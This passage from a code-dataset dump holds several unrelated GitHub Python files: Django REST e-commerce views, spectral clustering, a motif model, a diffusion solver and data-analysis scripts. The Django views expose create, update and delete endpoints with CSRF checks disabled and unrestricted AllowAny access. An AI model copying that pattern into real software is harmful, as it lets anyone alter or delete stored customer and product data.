customers = Customer.objects.all()\r\n serializer = CustomerSerializer(customers,many=True)\r\n return Response(serializer.data)\r\n elif request.method == 'POST':\r\n serializer = CustomerSerializer(data=request.data)\r\n if serializer.is_valid():\r\n 
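# payload validated: persist the new customer and return it with HTTP 201\r\n            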
serializer.save()\r\n return Response(serializer.data,status=201)\r\n else:\r\n return Response(serializer.errors,status=400)\r\n \r\n \r\n\r\n\r\n@csrf_exempt\r\n@api_view(['GET','PUT','PATCH','DELETE'])\r\n@permission_classes((AllowAny,))\r\ndef DetailCustomer(request,pk):\r\n customer=Customer.objects.get(pk=pk)\r\n if request.method =='GET':\r\n serializer =CustomerSerializer(customer)\r\n return Response(serializer.data)\r\n elif request.method == 'PUT':\r\n serializer = CustomerSerializer(customer, data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data,status=201)\r\n else:\r\n return Response(serializer.errors, status=400) \r\n \r\n elif request.method == 'PATCH':\r\n serializer = CustomerSerializer(customer,data=request.data,partial=True)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data,status=201)\r\n else:\r\n return Response(serializer.errors,status=400)\r\n \r\n elif request.method == 'DELETE':\r\n customer.delete()\r\n return Response(status=204)\r\n \r\n@csrf_exempt\r\n@api_view(['GET','POST'])\r\n@permission_classes((AllowAny,))\r\ndef ProductList(request):\r\n if request.method == 'GET':\r\n products = Product.objects.all()\r\n serializer = ProductSerializer(products, many=True)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'POST':\r\n serializer = ProductSerializer(data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data, status=201)\r\n else:\r\n return Response(serializer.errors, status=400)\r\n \r\n\r\n@csrf_exempt\r\n@api_view(['GET','PUT','PATCH','DELETE'])\r\n@permission_classes((AllowAny,))\r\ndef ProductDetail(request,pk):\r\n product = Product.objects.get(pk=pk)\r\n if request.method == 'GET':\r\n serializer = ProductSerializer(product)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'PUT':\r\n serializer = ProductSerializer(product, data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n \r\n return Response(serializer.data,status=201)\r\n else:\r\n return Response(serializer.errors, status=400)\r\n\r\n elif request.method == 'PATCH':\r\n serializer = ProductSerializer(product, data=request.data, partial=True)\r\n if serializer.is_valid():\r\n \r\n registration_date = product.product_added_on\r\n two_months_ago = datetime.now() - timedelta(days=60)\r\n if registration_date <= two_months_ago:\r\n product.product_active = False\r\n serializer.save()\r\n return Response(serializer.data,status=201)\r\n else:\r\n return Response(serializer.errors, status=400)\r\n\r\n elif request.method == 'DELETE':\r\n product.delete()\r\n return Response(status=204)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n ","repo_name":"Alfinalfi/task_ecommerce","sub_path":"django_ecommerce/ecommerce/ecommerce/shopapi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"69886909960","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport random\nimport math\n\nfrom sklearn.cluster import KMeans\nfrom scipy.fftpack import fft, dctn, idctn\n\nfrom fn.data_functions import convert_one_hot\nfrom fn.map_functions import plot_sample\n\n\ndef get_affinity(mat, sig, diag_zero=True, compute_dist=True, view_mat=False, view_hist=False):\n def get_distance(mat_, normalize=True):\n if normalize:\n for dim in range(mat_.shape[0]):\n 
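# min-max scale each channel to [0, 1] so every feature contributes comparably to the distances\n                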
mat_[dim, :, :] = (mat_[dim, :, :] - np.amin(mat_[dim, :, :])) / (\n np.amax(mat_[dim, :, :]) - np.amin(mat_[dim, :, :]))\n\n # need to flatten the matrix first.\n mat_ = np.reshape(mat_, [8, -1])\n\n distance_mat = np.zeros([mat_.shape[-1], mat_.shape[-1]])\n\n for var1 in range(mat_.shape[-1]):\n for var2 in range(mat_.shape[-1]):\n distance_mat[var1, var2] = np.sum((mat_[:, var1] - mat_[:, var2]) ** 2) ** 0.5\n\n return distance_mat\n\n print('computing affinity matrix for \\u03C3 = ' + str(round(sig, 2)))\n if compute_dist:\n dist_mat = get_distance(mat, normalize=True)\n else:\n dist_mat = np.copy(mat)\n\n affinity_mat = np.exp(-1 * (dist_mat ** 2) / (2 * (sig ** 2)))\n\n if diag_zero:\n np.fill_diagonal(affinity_mat, 0)\n\n if view_mat:\n plt.figure(figsize=(8, 4))\n plt.subplot(121), plt.imshow(dist_mat), plt.colorbar()\n plt.title('euclidean distance matrix')\n plt.subplot(122), plt.imshow(affinity_mat), plt.colorbar()\n plt.title('affinity matrix with \\u03C3 = ' + str(round(sig, 2)))\n plt.show()\n\n if view_hist:\n affinity_temp = np.reshape(affinity_mat, (-1))\n plt.figure(figsize=(6, 4))\n sns.displot(affinity_temp, kind='kde')\n plt.show()\n\n return affinity_mat\n\n\ndef get_laplacian(mat, normalize=True, symmetry=True, view=False):\n print('computing laplacian..')\n\n # creating degree matrix. sum of values in each row of affinity matrix.\n degree = np.zeros_like(mat)\n for i in range(degree.shape[0]):\n degree[i, i] = np.sum(mat[i, :])\n\n # print('degree =\\n' + str(np.round(degree, 2)))\n\n if normalize:\n if symmetry:\n degree_sq = (np.linalg.inv(degree)) ** 0.5\n # print('degree inverse sqrt =\\n' + str(np.round(degree_sq, 2)))\n laplacian = np.matmul(np.matmul(degree_sq, mat), degree_sq)\n else:\n degree_sq = (np.linalg.inv(degree))\n laplacian = np.identity(mat.shape[0]) - np.matmul(degree_sq, mat)\n else:\n laplacian = degree - mat\n if view:\n plots, names = np.array([laplacian, degree]), ['Laplacian\\nnormalized = ' + str(normalize), 'degree matrix']\n plt.figure(figsize=(4 * plots.shape[0], 4))\n for i in range(plots.shape[0]):\n plt.subplot(1, 3, i + 1), plt.title(names[i]), plt.imshow(plots[i, :, :])\n plt.show()\n return laplacian\n\n\ndef get_eigen(mat, sig=None, absolute=True, eigengap_only=False, view=False):\n print('get eigen...')\n\n [eig_val, eig_vec] = np.linalg.eig(mat)\n if absolute:\n eig_val = np.abs(eig_val)\n eigen_gap = np.abs(np.diff(eig_val))\n\n else:\n eigen_gap = np.diff(eig_val)\n\n if view:\n plt.figure(figsize=(12, 4))\n plt.subplot(121), plt.stem(eig_val), plt.xlim([-1, 10]), plt.ylim([0, 1])\n plt.title('eigen-values for \\u03C3 = ' + str(round(sig, 2)))\n plt.xlabel('eigen-index'), plt.ylabel('eigen-value')\n plt.subplot(122), plt.stem(eigen_gap), plt.xlim([-1, 10]), plt.ylim([0, 1])\n plt.title('eigen-gap for \\u03C3 = ' + str(round(sig, 2)))\n plt.xlabel('eigen-index'), plt.ylabel('eigen-gap')\n plt.show()\n\n if eigengap_only:\n return eigen_gap\n else:\n return eigen_gap, eig_val, eig_vec\n\n\ndef sigma_optimum(test_sample, k, sig_range=None, cluster=False, method='Weiss', abs_eig=True, view_sample=False,\n view_sig=False, view_clusters=False):\n \"\"\"In this function, we set 'k' which is the amount of clusters we need, and find the\n OPTIMAL SIGMA value for that k, where the sigma corresponding to the LARGEST Kth EIGEN-GAP wins.\n It makes the most sense compared to just going over everything for now because in some cases\n we get 1--2 clusters as optimal for sigma values.\"\"\"\n print('sigma sweep function...')\n\n def 
sigma_sweep(test_sample_, sig_range_, method_, abs_eig_):\n # set the diagonal of the affinity mat to zero or not\n if 'weiss' in method_.lower() or 'ng' in method_.lower():\n diag_zero_ = True\n print('computation according to Ng and Weiss. Diagonal elements of the Affinity matrix (A) will be zero')\n elif 'von' in method_.lower() or 'luxburg' in method_.lower():\n diag_zero_ = False\n print('computation according to Von Luxburg. Diagonal elements of the Affinity matrix (A) will be 1')\n else:\n diag_zero_ = True\n print('Cannot detect method.\\ncomputation according to Ng and Weiss. Diagonal elements of the Affinity '\n 'matrix (A) will be zero')\n\n # some initializations for later analysis\n eig_gaps_, eig_vals_, eig_vecs_ = [], [], []\n\n sig_list_ = np.linspace(sig_range_[0], sig_range_[1], 10)\n\n \"\"\" sigma sweep starts here \"\"\"\n print('sigma sweep starts here...')\n\n for num_ in range(len(sig_list_)):\n sig_ = sig_list_[num_]\n affinity = get_affinity(test_sample_, sig_, diag_zero=diag_zero_, compute_dist=True, view_mat=False,\n view_hist=False)\n # computing laplacian\n laplacian = get_laplacian(affinity, normalize=True, symmetry=True,\n view=False)\n\n # computing eigenvalues and eigen-gaps\n eigen_gap_, eigen_val_, eigen_vec_ = get_eigen(laplacian, sig_, absolute=abs_eig_, eigengap_only=False,\n view=False)\n eig_gaps_.append(eigen_gap_)\n eig_vecs_.append(eigen_vec_)\n eig_vals_.append(eigen_val_)\n\n return np.array(eig_gaps_), np.array(eig_vecs_), np.array(eig_vals_)\n\n if sig_range is None:\n sig_range = [0.1, 0.3]\n sig_list = np.linspace(sig_range[0], sig_range[1], 10)\n\n eig_gaps, eig_vecs, eig_vals = sigma_sweep(test_sample, sig_range, method, abs_eig)\n sig_opt = sig_list[np.argmax(np.abs(eig_gaps[:, k]))]\n\n if cluster:\n for num in range(len(sig_list)):\n eigen_vec = eig_vecs[num]\n cluster_spectral(test_sample, k, sig_list[num], eigen_vec=eigen_vec, view_sample=False)\n\n print('optimal \\u03C3 value for (k=' + str(k) + ') is: ' + str(round(sig_opt, 3)))\n print('the corresponding eigen-gap value is: ' + str(round(np.amax(eig_gaps), 3)))\n\n if view_sample:\n plot_sample(test_sample)\n\n if view_sig:\n plt.figure(figsize=(6, 4))\n plt.stem(sig_list, eig_gaps[:, k])\n plt.ylabel('eigen-gap for k = ' + str(k)), plt.xlabel('\\u03C3')\n plt.show()\n\n return sig_opt\n\n\ndef cluster_spectral(test_sample, k, sig, eigen_vec=None, return_2d=True, method='Ng and Weiss', view_clusters=False,\n view_sample=False):\n print('spectral clustering....')\n\n if 'weiss' in method.lower() or 'ng' in method.lower():\n diag_zero = True\n elif 'von' in method.lower() or 'luxburg' in method.lower():\n diag_zero = False\n else:\n diag_zero = True\n\n if eigen_vec is None:\n A = get_affinity(test_sample, sig, diag_zero)\n L = get_laplacian(A)\n _, _, eigen_vec = get_eigen(L, sig)\n else:\n pass\n\n # extracting the 'k' eigenvectors corresponding to the optimal mode k\n mode_x = eigen_vec[:, 0:k]\n mode_y = np.zeros_like(mode_x)\n for row in range(mode_x.shape[0]):\n mode_y[row, :] = mode_x[row, :] / (np.sum(mode_x[row, :] ** 2) ** 0.5)\n\n title = 'Algorithm: Spectral Clustering according to ' + method + '\\nunsupervised clusters for k=' + str(\n k) + 'and \\u03C3=' + str(round(sig, 3))\n\n labels, labels_one_hot = cluster_kmeans(test_sample, k, feature_mat=mode_y, return_2d=True,\n view_clusters=view_clusters,\n view_sample=view_sample, title=title)\n\n return labels, labels_one_hot\n\n\ndef cluster_kmeans(test_sample, k, feature_mat=None, return_2d=True, view_clusters=False, 
view_sample=False,\n title=None):\n print('kmean clustering...')\n\n if feature_mat is None:\n feature_mat = np.transpose(test_sample, (1, 2, 0))\n feature_mat = np.reshape(feature_mat, (-1, feature_mat.shape[-1]))\n\n k_mean = KMeans(n_clusters=k)\n k_mean.fit(feature_mat)\n\n cluster_labels = k_mean.labels_\n\n one_hot_ranked = convert_one_hot(cluster_labels, k, rank=True)\n\n one_hot_2d = np.reshape(one_hot_ranked, (k, test_sample.shape[-2], test_sample.shape[-1]))\n labels_2d = np.reshape(cluster_labels, (test_sample.shape[-2], test_sample.shape[-1]))\n\n if view_sample:\n plot_sample(test_sample)\n\n if view_clusters:\n if title is None:\n title = 'k-means clustering where k=' + str(k)\n cols = 4\n rows = math.ceil((k + 1) / cols)\n plt.figure(figsize=(cols * 4, rows * 4))\n for i in range(k + 1):\n plt.subplot(rows, cols, i + 1)\n if i == k:\n plt.imshow(labels_2d)\n plt.title('segmented image (segments in no specific order)')\n else:\n plt.imshow(one_hot_2d[i, :, :])\n plt.title('cluster label = ' + str(i + 1))\n plt.suptitle(title)\n plt.show()\n\n return labels_2d, one_hot_2d\n\n\ndef dct_image(img1, scale_down, filter_size=8, view=False, title=None):\n print('scale down image...')\n\n def dct_single(img, scale, filter_=8, view_=False, title_=None):\n if title_ is None:\n title_ = str(scale_down) + 'x compressed image after DCT-II\\nFilter size: ' + str(filter_)\n else:\n pass\n\n sample_size = math.floor(filter_ / scale_down)\n\n x_len = int(filter_ * math.floor(img.shape[1] / filter_))\n y_len = int(filter_ * math.floor(img.shape[0] / filter_))\n\n img = img[0:y_len, 0:x_len]\n samples_x = int(img.shape[1] / filter_)\n samples_y = int(img.shape[0] / filter_)\n\n img_new = np.zeros((samples_y * sample_size, samples_x * sample_size))\n\n for i in range(samples_y):\n for j in range(samples_x):\n img_seg = img[filter_ * i: filter_ * (i + 1), filter_ * j: filter_ * (j + 1)]\n dct_seg = dctn(img_seg)\n img_sampled = idctn(dct_seg, shape=(sample_size, sample_size))\n img_sampled = img_sampled * np.mean(img_seg) / np.mean(img_sampled)\n img_new[sample_size * i: sample_size * (i + 1), sample_size * j: sample_size * (j + 1)] = img_sampled\n\n if view_:\n plt.figure(figsize=(8, 4))\n plt.subplot(121), plt.imshow(img)\n plt.title('Original image')\n plt.clim(0, 1)\n plt.subplot(122), plt.imshow(img_new)\n plt.title(title_)\n plt.clim(0, 1)\n plt.show()\n\n return img_new\n\n if len(img1.shape) == 3:\n dct_multi = []\n for i in range(img1.shape[0]):\n dct_multi.append(dct_single(img1[i, :, :], scale_down, filter_size, view, title))\n compressed_image = np.array(dct_multi)\n else:\n compressed_image = dct_single(img1, scale_down, filter_size, view, title)\n\n return compressed_image\n","repo_name":"pdncovid/remote_sensing","sub_path":"fn/spectral_functions.py","file_name":"spectral_functions.py","file_ext":"py","file_size_in_byte":11752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"74767332754","text":"from fastapi import APIRouter\nfrom db import *\nfrom utils.tokens import *\nfrom dataclasses import dataclass\n\nrouter = APIRouter()\n\n\n@dataclass(slots=True)\nclass ProfileResult:\n username: str\n mail: str\n avatar: str\n\n\n@router.get('/user/profile',\n tags=['User Methods'],\n name='View User Profile',\n response_model=ProfileResult)\nasync def view_profile(user_id: int = Depends(authenticated_user)):\n with db_session:\n user = User[user_id]\n return ProfileResult(\n username=user.name,\n mail=user.email,\n 
avatar=\"http://localhost:9000/\" + user.avatar\n )\n","repo_name":"gran-soldador/pyrobots-backend","sub_path":"endpoints/user/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"29100710035","text":"import numpy\n\n__author__ = 'Romain Tavenard romain.tavenard[at]univ-rennes2.fr'\n\n\n# d denotes document index\n# i denotes an observation in a document\n# m denotes a motif\n# o denotes a motif occurrence in a document\n\nclass HierarchicalDirichletLatentSemanticMotifs:\n def __init__(self, motif_length, n_words, alpha, eta, gamma, n_iter=100):\n self.wo = [] # d, i -> o\n self.om = [] # d, o -> m\n self.ost = [] # d, o -> st\n\n self.motif_length = motif_length\n self.n_words = n_words\n\n self.alpha = alpha\n self.eta = eta\n self.gamma = gamma\n\n self.n_iter = n_iter\n\n self.docs_ = None\n\n self.n_occ_ = 0\n self.n_occ_m_ = []\n\n self.n_obs_m_ = []\n self.n_obs_wtm_ = []\n\n @property\n def n_docs(self):\n return len(self.wo)\n\n @property\n def n_motifs(self):\n return len(self.n_occ_m_)\n\n # Short names for n_words and motif_length\n @property\n def n_t(self):\n return self.motif_length\n\n @property\n def n_w(self):\n return self.n_words\n\n def p_wt_m(self, m):\n return (self.n_obs_wtm_[m] + self.eta) / (self.n_obs_m_[m] + self.n_w * self.n_t * self.eta)\n\n def fit(self, docs):\n \"\"\"Fitting the model to observations found in docs.\n\n docs is a list of numpy arrays. Each array has shape (n_obs[d], 2).\n docs[d][:, 0] contains words.\n docs[d][:, 1] contains timestamps.\n \"\"\"\n self.__init_from_data(docs)\n for _ in range(self.n_iter):\n self._fit_one_iter(docs)\n return self\n\n def _fit_one_iter(self, docs):\n for d in range(self.n_docs):\n n_obs_d = self.wo[d].shape[0]\n n_ts_d = numpy.max(docs[d][:, 1]) + 1\n for i in range(n_obs_d):\n w_di = docs[d][i, 0]\n t_di = docs[d][i, 1]\n old_wo_di = self.wo[d][i]\n n_occ_d = len(self.om[d]) # number of occurrences in the current doc\n\n self._cancel_obs(d, i)\n\n probas = numpy.zeros((n_occ_d + 1, ))\n # Existing occurrence case\n for o in range(n_occ_d):\n rt_di = t_di - self.ost[d][o]\n if 0 <= rt_di < self.n_t:\n m_di = self.om[d][o]\n # Using Eq. 10 from supp material (cf pdf)\n p_wt = (self.n_obs_wtm_[m_di][w_di, rt_di] + self.eta) / (self.n_obs_m_[m_di] +\n self.n_w * self.n_t * self.eta) # Assumes uniform prior\n # Using Eq. 
11 from supp material (cf pdf)\n p_o = self._n_obs_do(d, o) / (n_obs_d - 1 + self.alpha)\n probas[o] = p_wt * p_o\n # New occurrence case\n probas_motif = numpy.zeros((self.n_motifs + 1, ))\n denom_gamma = self.n_occ_ + self.gamma # Denom in Eq 15\n p_o = self.alpha / (n_obs_d - 1 + self.alpha)\n for m in range(self.n_motifs):\n p_wt = (self.n_obs_wm_(w_di, m) + self.eta) / (self.n_obs_m_[m] + self.eta * self.n_w * self.n_t) # Eq 16\n p_k = self.n_occ_m_[m] / denom_gamma # Eq 15\n probas_motif[m] = p_k * p_wt / n_ts_d # Eq 14\n # New occurrence, new motif case\n probas_motif[-1] = self.gamma / (denom_gamma * self.n_words * n_ts_d) # p_o factor is given afterwards\n probas[-1] = p_o * numpy.sum(probas_motif)\n\n draw = numpy.random.multinomial(1, pvals=probas / numpy.sum(probas))\n new_wo_di = numpy.argmax(draw)\n if new_wo_di == n_occ_d: # New occurrence drawn\n self.ost[d].append(t_di - numpy.random.randint(self.motif_length))\n draw = numpy.random.multinomial(1, pvals=probas_motif / numpy.sum(probas_motif))\n m = numpy.argmax(draw)\n self.om[d].append(m)\n self.n_occ_ += 1\n if m < self.n_motifs:\n self.n_occ_m_[m] += 1\n else:\n self.n_occ_m_.append(1) # Creating a new motif with a single occurrence\n self._change_occurrence(d, i, old_wo_di, new_wo_di)\n\n def n_obs_wm_(self, w, m):\n return numpy.sum(self.n_obs_wtm_[m][w, :])\n\n def _n_obs_do(self, d, o):\n return numpy.sum(self.wo[d] == o)\n\n def _cancel_obs(self, d, i):\n o = self.wo[d][i]\n if o >= 0:\n m = self.om[d][o]\n self.n_obs_m_[m] -= 1\n rt = self.docs_[d][i, 1] - self.ost[d][o]\n w = self.docs_[d][i, 0]\n self.n_obs_wtm_[m][w, rt] -= 1\n self.wo[d][i] = -1\n\n def _change_occurrence(self, d, i, old_wo_di, new_wo_di):\n self.wo[d][i] = new_wo_di\n # Update n_obs (only update for new affectation as previous one was already removed in _cancel_obs)\n self._update_n_obs(d, i, new_wo_di)\n\n if old_wo_di == new_wo_di:\n return None\n if old_wo_di >= 0:\n old_m = self.om[d][old_wo_di]\n else:\n old_m = None\n\n # Occurrence remapping\n if old_wo_di >= 0 and not self._exists_occurrence(d, old_wo_di):\n self.n_occ_ -= 1\n self.n_occ_m_[old_m] -= 1\n del self.om[d][old_wo_di]\n del self.ost[d][old_wo_di]\n for _i in range(self.wo[d].shape[0]):\n if self.wo[d][_i] > old_wo_di:\n self.wo[d][_i] -= 1\n # Motif remapping\n if old_m is not None and not self._exists_motif(old_m):\n del self.n_occ_m_[old_m]\n del self.n_obs_m_[old_m]\n del self.n_obs_wtm_[old_m]\n for _d in range(len(self.docs_)):\n for _o in range(len(self.om[_d])):\n if self.om[_d][_o] > old_m:\n self.om[_d][_o] -= 1\n\n def _update_n_obs(self, d, i, o):\n m = self.om[d][o]\n rt = self.docs_[d][i, 1] - self.ost[d][o]\n w = self.docs_[d][i, 0]\n if m < len(self.n_obs_m_):\n self.n_obs_m_[m] += 1\n self.n_obs_wtm_[m][w, rt] += 1\n else:\n self.n_obs_m_.append(1)\n n_obs = numpy.zeros((self.n_words, self.motif_length), dtype=numpy.int)\n n_obs[w, rt] = 1\n self.n_obs_wtm_.append(n_obs)\n\n def _exists_occurrence(self, d, o):\n for _o in self.wo[d]:\n if _o == o:\n return True\n return False\n\n def _exists_motif(self, m):\n return self.n_occ_m_[m] > 0\n\n def __init_from_data(self, docs):\n self.wo = [numpy.zeros((doc_d.shape[0], ), dtype=numpy.int) - 1 for doc_d in docs]\n self.om = [[] for doc_d in docs]\n self.ost = [[] for doc_d in docs]\n self.docs_ = docs\n\n self.n_occ_ = 0\n self.n_occ_m_ = []\n\n self.n_obs_m_ = []\n self.n_obs_wtm_ = 
[]\n","repo_name":"rtavenar/hdlsm","sub_path":"hdlsm_model.py","file_name":"hdlsm_model.py","file_ext":"py","file_size_in_byte":7060,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"84"} +{"seq_id":"1746756485","text":"#!/usr/bin/env python\nimport scipy as sp\nimport matplotlib.pyplot as plt\n\ndef error(f,x,y):\n return sp.sum((f(x)-y)**2)\n\n\n#loading data\n#____________________\ndata = sp.genfromtxt(\"/Users/avinashkulkarni/data.tsv\",delimiter = \"\\t\")\nx = data[:,0]\ny = data[:,1]\n\n\n#polynomial fitting\n#____________________\nfp1,residuals,rank,sv,rcond = sp.polyfit(x,y,1,full=True)\nf1 = sp.poly1d(fp1)\nprint(error(f1,x,y))\n#____________________\nf2p = sp.polyfit(x,y,2)\nf2 = sp.poly1d(f2p)\nprint(error(f2,x,y))\n#____________________\nf3p = sp.polyfit(x,y,3)\nf3 = sp.poly1d(f3p)\nprint(error(f3,x,y))\n\n#plotting\n#____________________\nplt.scatter(x,y)\nplt.title(\"Quadratic Plot\")\nplt.xlabel(\"time\")\nplt.ylabel(\"Hits\")\n#plt.xticks\nfx=sp.linspace(0,x[-1],30)\nplt.plot(fx,f1(fx),linewidth=1)\nplt.plot(fx,f2(fx),linewidth=1)\nplt.plot(fx,f3(fx),linewidth=1)\nplt.autoscale(tight=True)\nplt.grid()\nplt.show()\n\n\n#========================\n","repo_name":"ninadk1092/ML-Python","sub_path":"plot/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"13165322121","text":"from pymongo import MongoClient\n#pip install pymongo\n\nclass MongoConnect():\n\n def save(self, json):\n try:\n cliente = MongoClient('localhost', 27017)\n db = cliente.teste #nome do banco\n colecao = db.aluno #nome da coleção\n id = colecao.insert_one(json).inserted_id\n except Exception as e:\n print(\"problema ao salvar registro\")\n print(json)\n print(e)","repo_name":"teago83/MongoDB","sub_path":"conexao.py","file_name":"conexao.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"9070211542","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 24 21:02:28 2020\n\n@author: alex\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Konstanten\nL=10\ncells=100\nTw=20\nkappa = 1\nAo = 1\n\n# Domain Definition\n\ndelta_x=L/cells\nx=np.linspace(delta_x/2,L-delta_x/2,cells)\n\n# Koeffizientenmatrix\nA=np.zeros([cells,cells])\n\n# Q-Vektor\n\nQ=np.zeros([cells,1])\n\nw=np.zeros([cells,1])\nw[int(cells/3):int(2*cells/3)]=1\n\n\n\n# innere Stützstellen\nfor i in range(1,cells-1):\n A[i,i-1]= 1 * (kappa * Ao / delta_x)\n A[i,i] = -2* (kappa * Ao / delta_x)\n A[i,i+1]= 1 * (kappa * Ao / delta_x)\n \n # Q Vektor\n Q[i]=-w[i]*delta_x * Ao\n \n# Randwerte\n# linker Rand\nA[0,0] = -3 * (kappa * Ao / delta_x)\nA[0,1] = 1 * (kappa * Ao / delta_x)\nQ[0] = -delta_x *Ao * w[0] - 2*kappa*Ao*Tw/delta_x\n\n# Rechter Rand \nA[-1,-1] = -1 * (kappa * Ao / delta_x)\nA[-1,-2] = 1 * (kappa * Ao / delta_x)\nQ[-1] = -delta_x *Ao * w[-1]\n\n\n# Lösung\n\nT=np.linalg.solve(A, Q)\n\n# plotten\nplt.plot(x,T,'r-o')\nplt.plot(x,w,'b--')\n\n# oder plotten inklsive Randwerte\n#plt.plot(np.append(np.append(0,x),L),np.append(np.append(Tw,T),T[-1]),'b-o')\n\n","repo_name":"karan-kc/CFD","sub_path":"Rechnerubung/Week3/Aufgabe/1d_Diffusion_FVM.py","file_name":"1d_Diffusion_FVM.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} 
+{"seq_id":"13280672174","text":"from .base import PipBaseRecipe\n\n\nclass DocutilsRecipe(PipBaseRecipe):\n def __init__(self, *args, **kwargs):\n super(DocutilsRecipe, self).__init__(*args, **kwargs)\n self.sha256 = '51e64ef2ebfb29cae1faa133b3710143' \\\n '496eca21c530f3f71424d77687764274'\n\n self.name = 'docutils'\n self.depends = []\n self.version = '0.14'\n","repo_name":"stangelandcl/hardhat","sub_path":"hardhat/recipes/python/docutils.py","file_name":"docutils.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"30700114095","text":"# -*- encoding=utf-8 -*-\nimport os, sys\n\ndef writefile(nameindex):\n try:\n rfile = open(\"C:/Users/Administrator/Desktop/abc.txt\", \"r\")\n wfile = open(\"C:/Users/Administrator/Desktop/abc2.txt\", \"w\")\n except IOError:\n print (\"The file don't exist, Please double check!\")\n exit()\n n = 0;\n AllLines = rfile.readlines()\n for EachLine in AllLines:\n if (n != nameindex):\n wfile.write(''+'\\n')\n # print(n)\n else:\n wfile.write(EachLine)\n n=n+1\n rfile.close()\n wfile.close()\n\n S1 = wfile.closed\n if True == S1:\n print( 'the file is closed')\n else:\n print ('The file donot close')\n\nif __name__ == \"__main__\":\n i=1\n writefile(i)","repo_name":"snail0614/tools","sub_path":"Python/read_write_file.py","file_name":"read_write_file.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"15027902330","text":"import pandas\nimport numpy\nimport numpy as np \nfrom factor_analyzer import FactorAnalyzer\nfrom sklearn.cluster import KMeans\nfrom sklearn.mixture import GaussianMixture\nimport matplotlib.pyplot as pyplot\nfrom sklearn.metrics import silhouette_score\nimport scipy.cluster.hierarchy as shc\nfrom sklearn.cluster import AgglomerativeClustering\n\ndf = pandas.read_csv(\"dataset_final.csv\") # Load Data Set\n\n# US Subset\ndf_us = df.loc[df['country'] == \"US\"]\ndf_us.drop(['country'], axis=1,inplace=True)\ndf_us.drop(['Unnamed: 0'], axis=1,inplace=True)\ndf_us.replace(0,np.nan, inplace=True) #how do we drop or do we need to drop values = to zero\ndf_us.dropna(inplace=True)\n\n#print(df_us)\n\n# Hong Kong Subset\ndf_hk = df.loc[df['country'] == \"HK\"]\ndf_hk.drop(['country'], axis=1,inplace=True)\ndf_hk.drop(['Unnamed: 0'], axis=1,inplace=True)\ndf_hk.replace(0,np.nan, inplace=True) #how do we drop or do we need to drop values = to zero\ndf_hk.dropna(inplace=True)\n#print(df_hk)\n\n# Eigen Values - US\nmachine = FactorAnalyzer(n_factors=40, rotation=None)\nmachine.fit(df_us)\nev_US,v = machine.get_eigenvalues()\n#print(ev_US)\n\npyplot.scatter(range(1,df_us.shape[1]+1),ev_US)\npyplot.savefig(\"evplot_US.png\")\n\n\n# Eigen Values - HK\nmachine = FactorAnalyzer(n_factors=40, rotation=None)\nmachine.fit(df_hk)\nev_HK,v = machine.get_eigenvalues()\n#print(ev_HK)\n\npyplot.scatter(range(1,df_hk.shape[1]+1),ev_HK)\npyplot.savefig(\"evplot_HK.png\")\n\n\n\n# Using 6 Factors - US - 6 Factors chose based on eigen value elbow analysis\nmachine = FactorAnalyzer(n_factors=6, rotation='varimax')\nmachine.fit(df_us)\n\nloadings = machine.loadings_\nnumpy.set_printoptions(suppress=True)\n#print(loadings)\n#print(machine.get_factor_variance())\n\n\ndf_us = df_us.values \nresult = numpy.dot(df_us,loadings)\n#print(result)\n#print(result.shape)\n\n## For HK it is harder to choose the appropote number of factors, we do not have a diminsihing marginal 
returns. \n\nmachine = FactorAnalyzer(n_factors=10, rotation='varimax')\nmachine.fit(df_hk)\n\nloadings = machine.loadings_\nnumpy.set_printoptions(suppress=True)\n#print(loadings)\n#print(machine.get_factor_variance())\n\n\ndf_hk = df_hk.values \nresult = numpy.dot(df_hk,loadings)\n#print(result)\n#print(result.shape)\n\n## Compare the Analysis with AHC Clustering \n\n#AHC - US\nprint(\"US AHC silhouette score\")\npyplot.title(\"Dendrogram_US\")\ndendrogram_object = shc.dendrogram(shc.linkage(df_us, method = \"ward\")) \npyplot.savefig(\"dendrogram_US.png\")\npyplot.close()\n#Optimum # is 4 from the Dendrogram\nmachine = AgglomerativeClustering(n_clusters = 4, affinity=\"euclidean\", linkage=\"ward\")\nresults_ahc_us = machine.fit_predict(df_us)\n\nsilhouette = (silhouette_score(df_us, results_ahc_us, metric = 'euclidean'))\nprint(silhouette)\n\n\n# AHC - HK\nprint(\"HK AHC silhouette score\")\npyplot.title(\"Dendrogram_HK\")\ndendrogram_object = shc.dendrogram(shc.linkage(df_hk, method = \"ward\")) \npyplot.savefig(\"dendrogram_HK.png\")\npyplot.close()\n#Optimum # is 4 from the Dendrogram\nmachine = AgglomerativeClustering(n_clusters = 4, affinity=\"euclidean\", 